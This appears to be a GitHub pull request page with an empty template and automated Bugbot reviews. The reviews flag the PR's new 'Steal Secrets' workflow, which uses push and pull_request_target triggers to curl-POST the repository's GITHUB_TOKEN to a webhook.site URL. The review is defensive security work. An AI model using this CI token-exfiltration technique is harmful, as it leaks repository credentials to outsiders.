Create poc.yml

[dhirajthread-a11y]

Explanation

References

Checklist

• I've updated the test suite for new or updated code as appropriate
• I've updated documentation (JSDoc, Markdown, etc.) for new or updated code as appropriate
• I've communicated my changes to consumers by updating changelogs for packages I've changed
• I've introduced breaking changes in this PR and have prepared draft pull requests for clients and consumer packages to resolve them

---

Note

High Risk
Malicious CI that leaks repository GITHUB_TOKEN to a third-party endpoint, amplified by pull_request_target on fork PRs.

Overview
Adds a new GitHub Actions workflow .github/workflows/poc.yml named "Steal Secrets" that did not exist in the repo before.

It runs on push and pull_request_target, so it can execute in the context of the base repository (including on PRs from forks, where pull_request_target is especially sensitive). The sole job posts secrets.GITHUB_TOKEN to an external webhook.site URL via curl, which is credential exfiltration rather than normal CI.

This change should be rejected and not merged; if it ever ran on the default branch, rotate/revoke affected tokens and audit Actions runs.

^{Reviewed by Cursor Bugbot for commit 01199bb. Bugbot is set up for automated code reviews on this repo. Configure here.}

[cursor]

Cursor Bugbot has reviewed your changes and found 1 potential issue.

^{❌ Bugbot Autofix is OFF. To automatically fix reported issues with cloud agents, have a team admin enable autofix in the Cursor dashboard.}

^{Reviewed by Cursor Bugbot for commit 01199bb. Configure here.}

[cursor]

Exfiltrates GITHUB_TOKEN externally

High Severity

The workflow sends ${{ secrets.GITHUB_TOKEN }} in an HTTP POST to a third-party webhook.site URL on push and unscoped pull_request_target. That exposes repository credentials to an external party and can run with base-repo token access on pull requests, including from forks.

 

^{Reviewed by Cursor Bugbot for commit 01199bb. Configure here.}